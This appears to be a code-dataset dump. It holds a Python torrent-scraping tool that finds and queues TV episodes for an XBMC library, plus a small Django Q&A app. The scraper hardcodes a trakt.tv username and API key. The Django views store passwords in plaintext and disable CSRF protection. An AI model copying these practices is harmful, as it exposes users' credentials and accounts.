\".*torrent$\"\n\n def get_search_url(self, name, maskval):\n return \"http://extratorrent.cc/search/?search=\" + \"+\".join(name.split(\" \")).replace(\"'\",\"\")+\"+\"+\"+\".join(maskval.split(\" \")) + \"&new=1&x=0&y=0\"\n\n def validate_page(self, tor):\n lg = logging.getLogger('spiderbro')\n lg.debug(\"\\t\\tDoing extratorrent page validation for: \"+tor)\n lg.debug(\"\\t\\tNot Implemented: extratorrent page validation, returning true\")\n return True\n\n def get_torrent_from_validated_page(self, page):\n lg = logging.getLogger('spiderbro')\n lg.debug(\"\\t\\tConverting torrent url to ext format : \"+page)\n return \"http://extratorrent.cc\" + page.replace(\"torrent_\", \"\")\n\nclass IsoHuntSearch(BaseSearch):\n def __init__(self):\n self.name = \"isohunt\"\n self.delimiter = \"+\"\n self.can_get_tor_from_main_page = False\n\n def get_links_from_main_page_re(self):\n return \".*\"\n\n def get_is_link_a_torrent_re(self):\n return \".*tab=summary$\"\n\n def get_search_url(self, name, maskval):\n return \"http://isohunt.com/torrents/\" + \"+\".join(name.split(\" \")).replace(\"'\",\"\")+\"+\"+\"+\".join(maskval.split(\" \")) + \"?iht=-1&ihp=1&ihs1=1&iho1=d\"\n\n def get_torrent_from_validated_page(self, page):\n turl = \"http://www.isohunt.com\" + page\n resp = urllib2.urlopen(turl)\n val_page = resp.read()\n val_tags = BeautifulSoup(val_page)\n links = val_tags.findAll('a', href=re.compile(\"ca.*torrent\"))\n for l in links:\n return string.lower(l['href'])\n return \"\"\n\n def validate_page(self, tor):\n lg = logging.getLogger('spiderbro')\n lg.debug(\"\\t\\tDoing isohunt page validation for: \"+tor)\n lg.debug(\"\\t\\tNot Implemented: isohunt page validation, returning true\")\n return True\n\n\ndef get_configuration():\n \"\"\"\n read the configuration file, set opts\n \"\"\"\n # Set up config file\n conf_parser = argparse.ArgumentParser(add_help=False)\n conf_parser.add_argument(\"--conf_file\", help=\"Specify config file\", metavar=\"FILE\", default=\"/home/gom/code/python/spider_bro/config.ini\")\n args, remaining_argv = conf_parser.parse_known_args()\n defaults = {\"tv_dir\" : \"some default\",}\n if args.conf_file:\n config = ConfigParser.SafeConfigParser()\n config.read([args.conf_file])\n defaults = dict(config.items(\"spiderbro\"))\n\n # Don't surpress add_help here so it will handle -h\n parser = argparse.ArgumentParser(parents=[conf_parser], formatter_class=argparse.RawDescriptionHelpFormatter, description='Spiderbro! Spiderbro! Finding episodes for your shows!')\n parser.add_argument('--test', action=\"store_true\", default=False, help='Don\\'t actually download episodes')\n parser.add_argument('--debug_logging', action=\"store_true\", default=False, help='Turn on Debug Logging')\n parser.add_argument('--xbmc_sqlite_db', type=str, required=False, default=\"\", help='XBMC SQLite DB')\n parser.add_argument('--mysql', action=\"store_true\", default=True, help='Use Mysql DB')\n\n parser.add_argument('--host', type=str, required=False, default=\"\", help='Mysql host')\n parser.add_argument('--user', type=str, required=False, default=\"\", help='Mysql user')\n parser.add_argument('--pwd', type=str, required=False, default=\"\", help='Mysql password')\n parser.add_argument('--schema', type=str, required=False, default=\"\", help='MySql schema')\n\n parser.add_argument('-a', '--all', action=\"store_true\", default=True, help='Find episodes for all shows')\n parser.add_argument('-cc', '--clear_cache', action=\"store_true\", default=False, help='Clear the internal SB episode cache for show(s)')\n parser.add_argument('-f', '--use_file_renamer', action=\"store_true\", default=True, help='Use the file_renamer script after torrent downloads')\n parser.add_argument('-hq', '--high_quality', action=\"store_true\", default=False, help='Switch show to high quality')\n parser.add_argument('-lq', '--low_quality', action=\"store_true\", default=False, help='Switch show to low quality')\n parser.add_argument('-l', '--force_learn', action=\"store_true\", default=False, help='Force SB to mark episode(s) as downloaded')\n parser.add_argument('-p', '--polite', action=\"store_true\", default=False, help='Wait N seconds before opening each url')\n parser.add_argument('-v', '--verbose', action=\"store_true\", default=False, help='Verbose output')\n\n parser.add_argument('-d', '--db_file', type=str, required=False, default='spiderbro.db', help='Spiderbro internal database file')\n parser.add_argument('-ld', '--log_dir', type=str, required=False, default=\"log\", help='Logging Dir')\n parser.add_argument('-pv', '--polite-value', type=int, required=False, default=5, help='Num seconds for polite')\n parser.add_argument('-s', '--show', type=str, required=False, help='Find episodes for a single show')\n parser.add_argument('-t', '--tv_dir', type=str, required=False, default='/home/gom/nas/tv/', help='TV directory')\n parser.add_argument('--force_id', type=str, required=False, help='Force a show to change its id')\n\n parser.set_defaults(**defaults)\n args = parser.parse_args(remaining_argv)\n if args.show: args.all = False\n return args\n\n#################################################################################################################\n# SpiderBro main class\n#################################################################################################################\nclass SpiderBro:\n def __init__(self, opts, episode_masks=None, season_masks=None, ignore_taglist=None, site_search_list=None):\n \"\"\"\n Set up logger, db_manager, configuration\n \"\"\"\n if episode_masks is None: episode_masks = []\n if season_masks is None: season_masks = []\n if ignore_taglist is None: ignore_taglist = []\n if site_search_list is None: site_search_list = []\n self.episode_masks = episode_masks\n self.season_masks = season_masks\n self.ignore_taglist = ignore_taglist\n self.site_search_list = site_search_list\n\n self.config = opts\n self.logger = self.setup_logger()\n self.db = self.setup_db_manager()\n self.download_list = []\n\n def setup_logger(self):\n \"\"\"\n Set up all the logging paramters for SpiderBro\n \"\"\"\n start_day = str(datetime.today()).split(\" \")[0]\n setupLogger()\n self.logger = logging.getLogger(\"spiderbro\")\n if (self.config.debug_logging == True):\n self.logger.setLevel(logging.DEBUG)\n else:\n self.logger.setLevel(logging.INFO)\n formatter = logging.Formatter('[%(asctime)s] [%(levelname)s] %(message)s')\n handler_stream = logging.StreamHandler()\n handler_stream.setFormatter(formatter)\n handler_stream.setLevel(logging.CRITICAL)\n self.logger.addHandler(handler_stream)\n handler_file = logging.FileHandler('%s/spiderBro_%s.log' % (self.config.log_dir, start_day))\n handler_file.setFormatter(formatter)\n self.logger.addHandler(handler_file)\n self.logger.info(\"\")\n self.logger.info(\"SpiderBro, SpiderBro\")\n self.logger.info(\"Finding episodes for your shows\")\n self.log_debug_info()\n return self.logger\n\n def log_debug_info(self):\n \"\"\"\n Log some debugging info about configuration\n \"\"\"\n self.logger.debug(\"\")\n self.logger.debug(\"Using params:\")\n dic = vars(self.config)\n sopts = dic.keys()\n sopts.sort()\n for k in sopts:\n self.logger.debug(\"%s: %s\" % (k, dic[k]))\n self.logger.debug(\"\")\n\n def setup_db_manager(self):\n \"\"\"\n Set up the db manager based on a dictionary of options supplied by get_configuration\n \"\"\"\n db = db_manager()\n\n if(self.config.db_file):\n db.init_sb_db(self.config.db_file)\n else:\n db.init_sb_db('spiderbro.db')\n\n if(self.config.mysql):\n db.xbmc_init_mysql(self.config.host, self.config.user, self.config.pwd, self.config.schema) \n else: \n db.xbmc_init_sqlite(self.config.xbmc_sqlite_db) \n\n if(self.config.clear_cache and self.config.show):\n self.logger.info(\"Clearing db cache for show %s\" % (self.config.show))\n db.clear_cache(self.config.show)\n \n if(self.config.high_quality and self.config.show):\n self.logger.info(\"Changing quality to high for show %s\" % (self.config.show))\n db.set_quality(self.config.show, 1)\n \n if(self.config.low_quality and self.config.show):\n self.logger.info(\"Changing quality to low for show %s\" % (self.config.show))\n db.set_quality(self.config.show, 0)\n \n if(self.config.force_id and self.config.show):\n self.logger.info(\"Forcing new id %s for show %s\" % (self.config.force_id, self.config.show))\n db.update_series_id(self.config.show, self.config.force_id)\n return db\n \n\n def get_series_id(self, series_name):\n \"\"\"\n Get the tvdb.com series id for a given tv show\n \"\"\"\n \n xbmc_id = self.db.xbmc_get_series_id(series_name)\n sb_id = self.db.get_show_info(series_name)\n\n # Edge case can happen here where show in xbmc but not in sb_db, so we make sure it is inserted\n if(xbmc_id and not sb_id):\n self.logger.debug(\"No db entry found for show %s, creating default...\" % series_name)\n self.db.add_show(xbmc_id[0][0], series_name, 0)\n\n # try and get series id from xbmc db first if force_id not True\n if(xbmc_id and not ('force_id' in self.config)):\n self.logger.debug(\"\\t\\tGot series ID from XBMC: %s\" % xbmc_id[0][0])\n return xbmc_id[0][0]\n\n # otherwise go to sb_db\n if sb_id:\n sid = sb_id[0][0]\n self.logger.debug(\"\\t\\tGot series ID from Spiderbro Internal DB: %s\" % sid)\n return sid\n # finally go to tvdb if all other options exhausted\n else:\n try:\n page = urllib2.urlopen(\"http://thetvdb.com/api/GetSeries.php?seriesname=%s\" % urllib2.quote(series_name))\n soup = BeautifulSoup(page)\n sid = int(soup.data.series.seriesid.string)\n self.logger.debug(\"\\t\\tGot series ID from tvdb: %s\" % sid)\n self.db.add_show(sid, series_name, 0)\n return sid\n except Exception, e:\n self.logger.error(\"Error retrieving series id: %s\" % e)\n\n\n def get_episode_list(self, series_name):\n \"\"\"\n Return tuple:\n (list) the list of episodes to be downloaded for a show, if any\n (boolean) has_show_ended\n (int) highest season in show\n \"\"\"\n aired_list = []\n have_list = []\n highest_season = 1\n ended = False\n self.logger.info(\"Looking for eps for: %s\" % (series_name))\n # get the series id from db or web\n series_id = self.get_series_id(series_name)\n try:\n\n self.logger.debug(\"Using thetvdb ID: %s\" % (series_id))\n # now get the info for the series\n data = BeautifulSoup(urllib2.urlopen(\"http://thetvdb.com/data/series/%s/all/\" % str(series_id))).data\n if(data.series.status.string == \"Ended\"):\n ended = True\n\n # iterate through data, get list of season/episodes for show starting from 1 (0 are specials)\n for i in data.findAll('episode', recursive=False):\n if(i.seasonnumber.string != '0'):\n season = i.seasonnumber.string\n ep = i.episodenumber.string\n try:\n fa = i.firstaired.string.split('-')\n airdate = date(int(fa[0]), int(fa[1]), int(fa[2]))\n # need to compare current date to air date, ignore if not aired yet\n if date.today() > airdate:\n aired_list.append((season, ep))\n highest_season = max(highest_season, int(i.seasonnumber.string))\n except:\n pass\n except:\n self.logger.error(\"\\tCould not get episode list from thetvdb (timeout or invalid ID? Using ID: %s)\" % (series_id))\n self.logger.error(\"\")\n return [], False, highest_season\n\n try:\n # use the mysql lib to access xbmc db, cross check episode lists\n l = self.db.xbmc_get_eps_for_show(series_name)\n for i in l: have_list.append(i)\n\n # create new db con to torrents db, populate from here aswell\n l = self.db.get_eps_from_self(series_name)\n for s, e in l: have_list.append((str(s), str(e)))\n\n except ValueError as v:\n self.logger.error(\"Database error?\")\n self.logger.error(str(v))\n sys.exit()\n\n have_s = list(set([h[0] for h in have_list]))\n aired_s = list(set([a[0] for a in aired_list]))\n if(ended):\n seas = [c for c in aired_s if c not in have_s]\n else:\n seas = [c for c in aired_s if((c not in have_s) and (int(c) < highest_season))]\n\n have_seas = [val for val in have_list if val[1] == \"-1\"]\n ep_list = [val for val in aired_list if val not in have_list]\n\n for s in seas:\n ep_list = [c for c in ep_list if c[0] != s]\n ep_list.append((s, \"-1\"))\n for h in have_seas:\n ep_list = [c for c in ep_list if c[0] != h[0]]\n\n return ep_list, ended, highest_season\n\n def normalize_series_name(self, name):\n \"\"\"\n Return the tv show name stripped of any special characters, spaces replaced with _ and all in lower case\n \"\"\"\n normalized_showname = str(name)\n normalized_showname = str.lower(normalized_showname)\n normalized_showname = normalized_showname.replace(\"::\", \"\")\n normalized_showname = normalized_showname.replace(\": \", \" \")\n normalized_showname = normalized_showname.replace(\":\", \" \")\n normalized_showname = \"\".join(ch for ch in normalized_showname if ch not in [\"!\", \"'\", \":\", \"(\", \")\", \".\", \",\"])\n normalized_showname = normalized_showname.replace(\"&\", \"and\")\n normalized_showname = normalized_showname.replace(\" \", \"_\") \n return normalized_showname\n \n def hunt_eps(self, series_name):\n \"\"\"\n Find episodes on various torrent sites for some show\n \"\"\"\n normalized_showname = self.normalize_series_name(series_name)\n dir = self.config.tv_dir + normalized_showname\n \n is_high_quality = self.db.get_show_high_quality(series_name)\n\n ep_list, ended, highest_season = self.get_episode_list(series_name)\n\n if ended and not ep_list:\n self.logger.info(\"\\tGot all episodes for this, skipping in future\")\n self.db.mark_show_finished(series_name)\n elif ep_list:\n # search for sX eX using every search site and every filemask until torrent is found\n for s, e in ep_list:\n found = False\n # if searching for full season season use season mask list\n if(e == \"-1\"):\n self.logger.info(\"Searching for entire season %s of %s\" % (s, series_name))\n masks_list = self.season_masks\n else:\n masks_list = self.episode_masks\n for torrent_site_searcher_class in self.site_search_list:\n if not found:\n for mk_ctor in masks_list:\n if self.config.polite: time.sleep(self.config.polite_value)\n site = torrent_site_searcher_class()\n try:\n url = site.search(series_name, s, e, mk_ctor, self.ignore_taglist, is_high_quality)\n if url:\n self.logger.info(\"\\t\\tFound torrent: %s\" % url)\n save_dir = dir\n if(self.config.use_file_renamer):\n save_dir = dir + \"s\" + s + \"e\" + e\n dict = {'url':url, \"save_dir\":save_dir, 'showname':series_name, \"season\":s, \"episode\":e}\n self.download_list.append(dict)\n found = True\n break\n except AttributeError as ex:\n self.logger.error(\"%s timed out?\" % ex)\n except Exception, e:\n self.logger.error(\"Error: %s\" % e)\n traceback.print_exc()\n #sys.exit()\n if not found:\n #check episode is not in current season, do not search again if so\n ep_season = int(s)\n # something goes weird here; self.config.force_learn always evaluates as True using 'or self.config.force_learn' - why?\n if ((ep_season < highest_season) or ended or self.config.force_learn == True):\n self.logger.info(\"Cannot find torrent for: %s season %s episode %s - skipping this in future\" % (series_name, s, e))\n self.db.add_to_urls_seen(series_name, s, e, \"None\", \"None\")\n self.logger.info(\"\")\n\n def get_torrent_download_list(self):\n \"\"\"\n Searches for episodes of shows, populates spiderBros internal list of shows/urls to get\n \"\"\"\n ignore_list = self.db.get_ignore_list()\n\n if(self.config.all):\n # if ALL, we get the complete list of shows from xbmc, minus the finished shows (if any)\n self.logger.info(\"Scanning entire XBMC library, this could take some time...\")\n full_showlist = []\n db_showlist = self.db.xbmc_get_showlist()\n for show in db_showlist:\n if(show[0].decode('latin-1', 'replace') not in ignore_list): full_showlist.append(show[0])\n #TODO: add this to config file\n get_trakt_watch_list = True\n if(get_trakt_watch_list):\n self.logger.info(\"Looking for shows from trakt.com watchlist\")\n # get the watchlist from trakt and add\n traktlist = traktWatchlistScraper(\"thegom145\", \"b837e9f111dcae8e279711ce929e9ef1\")\n full_showlist.extend(t for t in traktlist if t.decode('latin-1', 'replace') not in ignore_list and t not in full_showlist)\n full_showlist.sort()\n for show in full_showlist:\n if(show.decode('latin-1', 'replace') not in ignore_list):\n self.hunt_eps(show)\n\n else:\n # if SHOW, get specified show\n if(self.config.show):\n self.hunt_eps(self.config.show)\n \n # else EXIT\n else:\n self.logger.info(\"No shows to download, exiting\")\n\n return self.download_list\n\ndef traktWatchlistScraper(username, key):\n \"\"\"\n returns a list of shows from the watchlist of a trakt user\n \"\"\"\n watchlist = []\n try:\n l = logging.getLogger(\"spiderbro\")\n url = \"http://api.trakt.tv/user/watchlist/shows.json/\"+ key +\"/\" + username\n response = urllib2.urlopen(url)\n data = json.load(response)\n watchlist = [i[\"title\"] for i in data]\n l.debug(\"Got list of watched shows from trakt.com:\")\n for show in watchlist: l.debug(show)\n except:\n pass\n" }, { "alpha_fraction": 0.5844562649726868, "alphanum_fraction": 0.5935443639755249, "avg_line_length": 36.97618865966797, "blob_id": "f579827f01238135a63b50f57bf3344ae8f55f04", "content_id": "b3d1db2389df29e04139644373d4c1fc89950359", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3191, "license_type": "no_license", "max_line_length": 105, "num_lines": 84, "path": "/gomXBMCTools.py", "repo_name": "GrahamOMalley/spiderBro", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\nimport unicodedata\nimport unittest\nimport re\n\ndef normaliseTVShowName(series_name):\n \"\"\" \n Uses normalization rules to change string to lowercased with _ instead of space\n and removes characters that are problematic for shell/dirnames\n \"\"\"\n series_name = str.lower(series_name)\n series_name = series_name.replace(\"::\", \"\")\n series_name = series_name.replace(\": \", \" \")\n series_name = series_name.replace(\":\", \" \")\n series_name = series_name.replace(\";\", \" \")\n series_name = series_name.replace(\"&\", \"and\")\n series_name = series_name.replace(\" \", \"_\") \n series_name = series_name.replace(\"/\", \"_\") \n series_name = series_name.replace(\"\\\\\", \"_\") \n series_name = series_name.replace(\"_-_\", \"_\") \n series_name = \"\".join(ch for ch in series_name if ch not in [\"!\", \"'\", \":\", \"(\", \")\", \".\", \",\", \"-\"])\n # unicode screws up some shows, convert to latin-1 ascii\n series_name = unicode(series_name, \"latin-1\")\n unicodedata.normalize('NFKD', series_name).encode('ascii','ignore')\n return series_name\n\ndef getTorrentNameFromMagnetLink(torrent):\n tor = re.sub(\"&tr.*$\", \"\", torrent)\n tor = re.sub(\"magnet.*=\", \"\", tor)\n return tor\n\ndef getEpisodeNumFromFilename(file, s):\n \"\"\" \n getEpisodeNumFromFilename(file): parse filename, return episode number\n \"\"\" \n sNeN = re.compile(\".*s01e([0-9][0-9]).*\")\n gr = sNeN.findall(file)\n try:\n if(gr[0]):\n return \"e\"+str(gr[0])\n except:\n pass\n \n\n return \"e-1\"\n\ndef formatNoAsStr(no):\n \"\"\" \n formatSeasonOrEpNo(): pad a zero if no < 10, else do nothing\n \"\"\"\n return \"0\" + str(no) if(int(no)<10) else str(no)\n\nclass testFunctions(unittest.TestCase):\n\n def setUp(self):\n self.shows = { \"Adam And Joe Go Tokyo\":\"adam_and_joe_go_tokyo\",\n \"American Dad!\":\"american_dad\",\n \"Archer (2009)\":\"archer_2009\",\n \"Avatar: The Last Airbender\":\"avatar_the_last_airbender\",\n \"Berry & Fulcher's Snuff Box\":\"berry_and_fulchers_snuff_box\",\n \"Charlie Brooker's Screenwipe\":\"charlie_brookers_screenwipe\",\n \"Eastbound & Down\":\"eastbound_and_down\",\n \"Lucy, The Daughter of the Devil\":\"lucy_the_daughter_of_the_devil\",\n \"Penn & Teller: Bullshit!\":\"penn_and_teller_bullshit\",\n \"Penn & Teller: Fool Us\":\"penn_and_teller_fool_us\",\n \"Star Wars - The Clone Wars\":\"star_wars_the_clone_wars\",\n \"Beavis and Butt-Head\":\"beavis_and_butthead\",\n \"Don't Trust the B---- in Apartment 23\":\"dont_trust_the_b_in_apartment_23\",\n \"Louis Theroux - Extreme Love\":\"louis_theroux_extreme_love\",\n \"NTSF:SD:SUV::\":\"ntsf_sd_suv\",\n \"The Venture Bros.\":\"the_venture_bros\",\n \"Steins;Gate\":\"steins_gate\",\n \"Love/Hate\":\"love_hate\"\n }\n\n def test_normalise(self):\n for k,v in self.shows.items():\n #print normaliseTVShowName(k), \" <-> \", v\n self.assertEqual(normaliseTVShowName(k), v)\n\nif __name__ == \"__main__\":\n # unit tests\n suite = unittest.TestLoader().loadTestsFromTestCase(testFunctions)\n unittest.TextTestRunner(verbosity=2).run(suite)\n\n" } ]
7
Jaskom/que_ans
https://github.com/Jaskom/que_ans
d72687cc767d3eee58868d80a0e17fd0c6b5d692
3f8b15201a55dd6bed0e977f6ad042cc05008d40
c13caeea81b7d2f9eb5dea449b93bf045bf05b55
refs/heads/master
2016-09-10T22:43:42.989172
2013-07-03T09:17:51
2013-07-03T09:17:51
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7631579041481018, "alphanum_fraction": 0.7631579041481018, "avg_line_length": 36, "blob_id": "60c5c7f1c08be7c0acc3183d33d808b08f988937", "content_id": "ee9ee68e4b7e7b7a1d784bcc8ddad7bab55f3586", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 152, "license_type": "no_license", "max_line_length": 58, "num_lines": 4, "path": "/que_ans_app/forms.py", "repo_name": "Jaskom/que_ans", "src_encoding": "UTF-8", "text": "from django import forms\nclass QuestionForm(forms.Form):\n que_owner=forms.CharField()\n que_description=forms.CharField(widget=forms.Textarea)\n \n" }, { "alpha_fraction": 0.6270467042922974, "alphanum_fraction": 0.6349302530288696, "avg_line_length": 38.975608825683594, "blob_id": "e301844d6e0f627c04b79b8c5a3026ff1f8d765f", "content_id": "a1cc5623b59b4f7699792a7d9b1b2383caedc0dd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1649, "license_type": "no_license", "max_line_length": 140, "num_lines": 41, "path": "/que_ans_app/tests.py", "repo_name": "Jaskom/que_ans", "src_encoding": "UTF-8", "text": "\"\"\"\nThis file demonstrates writing tests using the unittest module. These will pass\nwhen you run \"manage.py test\".\n\nReplace this with more appropriate tests for your application.\n\"\"\"\n\nfrom django.test import TestCase\nfrom django.test.client import Client\nimport datetime\nfrom que_ans_app.models import Question\n\nclass SimpleTest(TestCase):\n # def test_basic_addition(self):\n # \"\"\"\n # Tests that 1 + 1 always equals 2.\n # \"\"\"\n # self.assertEqual(1 + 1, 2)\n def test_add_question(self):\n c=Client()\n response=c.post('/add/',{'que_owner':'ylh', 'que_description':'how to write django unittest',\n 'que_publish_time':datetime.datetime.now().strftime(\"%Y-%m-%d\")})\n print(response.status_code)\n self.assertEqual(response.status_code, 200)\n def test1_add_question(self):\n c=Client()\n response=c.post('/add/',{'que_owner':'JasonnnnnnnnnnnnnnnnnJasonnnnnnnnnnnnnnnnn', 'que_description':'how to write django unittest',\n 'que_publish_time':datetime.datetime.now().strftime(\"%Y-%m-%d\")})\n \n #self.assertEqual(response.status_code, 200)\n \nclass QuestionTest(TestCase):\n def setUp(self):\n que_owner='ylh'\n que_description='how to write django unittest'\n que_publish_time=(datetime.datetime.now().strftime(\"%Y-%m-%d\"))\n question=Question(que_owner=que_owner,que_description=que_description,que_publish_time=que_publish_time)\n question.save()\n def test_queList(self):\n question=Question.objects.get(que_owner='ylh')\n print(question)\n \n\n" }, { "alpha_fraction": 0.6663163304328918, "alphanum_fraction": 0.6915396451950073, "avg_line_length": 28.734375, "blob_id": "e60f08c555ff9273b14977262631e1ea87a71953", "content_id": "d5f3031aa02c2791d16b1c1b8ea1e3abdd0b1f61", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1903, "license_type": "no_license", "max_line_length": 59, "num_lines": 64, "path": "/que_ans_app/models.py", "repo_name": "Jaskom/que_ans", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib import admin\n# Create your models here.\n\n\nclass Question(models.Model):\n que_owner = models.CharField(max_length=20)\n que_description = models.TextField()\n que_publish_time = models.DateField()\n\n def __unicode__(self):\n return self.que_description\n\n class Admin:\n pass\n\n\nclass Answer(models.Model):\n ans_description = models.TextField()\n ans_publish_time = models.DateField()\n question = models.ForeignKey(Question)\n\n def __unicode__(self):\n \"\"\"\n\n\n :return:\n \"\"\"\n return self.ans_description\n\n\nclass Blog(models.Model):\n blog_id = models.AutoField(primary_key=True)\n blog_tile = models.CharField(max_length=100)\n blog_content = models.TextField()\n blog_owner = models.IntegerField()\n blog_publish_time = models.DateTimeField()\n blog_sort = models.CharField(blank=True, max_length=50)\n blog1 = models.CharField(blank=True, max_length=50)\n blog2 = models.CharField(blank=True, max_length=50)\n blog3 = models.CharField(blank=True, max_length=50)\n blog4 = models.CharField(blank=True, max_length=50)\n\n\nclass User(models.Model):\n user_id=models.AutoField(primary_key=True)\n user_email = models.EmailField()\n user_password = models.CharField(max_length=50)\n user1 = models.CharField(blank=True, max_length=50)\n user2 = models.CharField(blank=True, max_length=50)\n user3 = models.CharField(blank=True, max_length=50)\n user4 = models.CharField(blank=True, max_length=50)\n user5 = models.CharField(blank=True, max_length=50)\n user6 = models.CharField(blank=True, max_length=50)\n user7 = models.CharField(blank=True, max_length=50)\n user8 = models.CharField(blank=True, max_length=50)\n user9 = models.CharField(blank=True, max_length=50)\n\n class Admin:\n pass\n\n\nadmin.site.register(Question)\nadmin.site.register(Answer)\n" }, { "alpha_fraction": 0.6681567430496216, "alphanum_fraction": 0.6697344183921814, "avg_line_length": 29.158729553222656, "blob_id": "70b4126f338ac3edb70663a748cc5f23a601ee12", "content_id": "bffaf47c405aaf9b15ead541896d345dcd03e0fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3803, "license_type": "no_license", "max_line_length": 112, "num_lines": 126, "path": "/que_ans_app/views.py", "repo_name": "Jaskom/que_ans", "src_encoding": "UTF-8", "text": "# Create your views here.\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.template import loader,Context\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render_to_response\nfrom que_ans_app.models import Question\nfrom que_ans_app.models import Answer\nfrom que_ans_app.models import User\nfrom django.core.paginator import Paginator,InvalidPage,EmptyPage\nimport datetime\n\n@csrf_exempt\ndef addQuestion(request):\n errors=[] \n que_owner=request.POST.get('owner')\n que_description=request.POST.get('des')\n if not que_owner:\n errors.append('the Publisher is required')\n if not que_description:\n errors.append('the Question is required')\n if not errors:\n que_publish_time=(datetime.datetime.now().strftime(\"%Y-%m-%d\"))\n question=Question(que_owner=que_owner,que_description=que_description,que_publish_time=que_publish_time)\n question.save()\n return HttpResponseRedirect(\"/list/\")\n else:\n return render_to_response('addQuestion.html',{'errors':errors})\n \n \ndef listQuestions(request):\n que_list=Question.objects.all()\n paginator = Paginator(que_list, 5)\n try:\n page = int(request.GET.get('page', '1'))\n except ValueError:\n page = 1\n\n try:\n questions = paginator.page(page)\n except (EmptyPage, InvalidPage):\n questions = paginator.page(paginator.num_pages)\n t=loader.get_template(\"listQuestions.html\")\n c=Context({'questions':questions})\n return HttpResponse(t.render(c))\n\ndef queryById(request):\n offset=request.GET.get('id')\n # print offset\n question=Question.objects.get(id=offset)\n #print question.id\n ans_list=Answer.objects.filter(question_id=offset)\n\n paginator = Paginator(ans_list, 5)\n try:\n page = int(request.GET.get('page', '1'))\n except ValueError:\n page = 1\n\n try:\n answers = paginator.page(page)\n except (EmptyPage, InvalidPage):\n answers = paginator.page(paginator.num_pages)\n\n t=loader.get_template(\"ans_que.html\")\n #c=Context({'question':question})\n c=Context({'question':question,'answers':answers})\n return HttpResponse(t.render(c))\n\n@csrf_exempt\ndef saveAanswer(request):\n \"\"\"\n\n :param request:\n :return:\n \"\"\"\n errors=[]\n ans_description=request.POST.get(\"ans_description\")\n question_id=request.POST.get(\"question_id\")\n if not ans_description:\n errors.append('the Answer is required')\n print question_id\n ans_publish_time=(datetime.datetime.now().strftime(\"%Y-%m-%d\"))\n answer=Answer(ans_description=ans_description,ans_publish_time=ans_publish_time,question_id=question_id)\n answer.save()\n return HttpResponseRedirect(\"/query/?id=\"+question_id)\n\n\ndef register(request):\n errors = []\n user_email = request.POST.get('email')\n user_password = request.POST.get('password')\n if not user_email:\n errors.append(\"user_email is required\")\n if not user_password:\n errors.append(\"user_password is required\")\n if not errors:\n user=User(user_email=user_email,user_password=user_password)\n user.save();\n return\n\n\ndef login(request):\n errors = []\n user_email = request.POST.get('email')\n user_password = request.POST.get('password')\n if not user_email:\n errors.append(\"user_email is required\")\n if not user_password:\n errors.append(\"user_password is required\")\n if not errors:\n user=User(user_email=user_email,user_password=user_password)\n user.save();\n\n\ndef preregister(request):\n return render_to_response(\"register.html\")\n\n\ndef index(request):\n \"\"\"\n\n :param request:\n :return:\n \"\"\"\n return render_to_response(\"index.html\")\n\n\n\n" }, { "alpha_fraction": 0.6872393488883972, "alphanum_fraction": 0.6872393488883972, "avg_line_length": 35.33333206176758, "blob_id": "6cc66dbf3f167574852e8bd8515a658f6ad7d79b", "content_id": "9f53794d3d8655ba6cbcc2b4c39c2d5ad85e95dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1199, "license_type": "no_license", "max_line_length": 71, "num_lines": 33, "path": "/que_ans/urls.py", "repo_name": "Jaskom/que_ans", "src_encoding": "UTF-8", "text": "from django.conf.urls import patterns, include, url\nfrom que_ans_app.views import addQuestion\nfrom que_ans_app.views import listQuestions\nfrom que_ans_app.views import queryById\nfrom que_ans_app.views import index\nfrom que_ans_app.views import saveAanswer\nfrom que_ans_app.views import preregister\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns \n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'que_ans.views.home', name='home'),\n # url(r'^que_ans/', include('que_ans.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', index),\n url(r'^add/$', addQuestion),\n url(r'^list/$', listQuestions),\n url(r'^preregister/$', preregister),\n url(r'^query/$', queryById),\n url(r'^saveAns/$', saveAanswer),\n url(r'^static/(?P<path>.*)$', 'django.views.static.serve',\n {'document_root': '/dgproject/que_ans/static'}\n ),\n\n)\n" } ]
5
EMeyerLab/PTGC
https://github.com/EMeyerLab/PTGC
7dfeac3cf1679f3594312bb56c12f03e01d185fb
d836e1745206ace74266646605ad89fe36e914a6
f40cef4b9ce53687b02f75dfd4fcd4a5c936d6ad
refs/heads/master
2022-04-02T15:53:55.086980
2020-01-28T16:51:09
2020-01-28T16:51:09
null
0
0
null
null
null
null
null
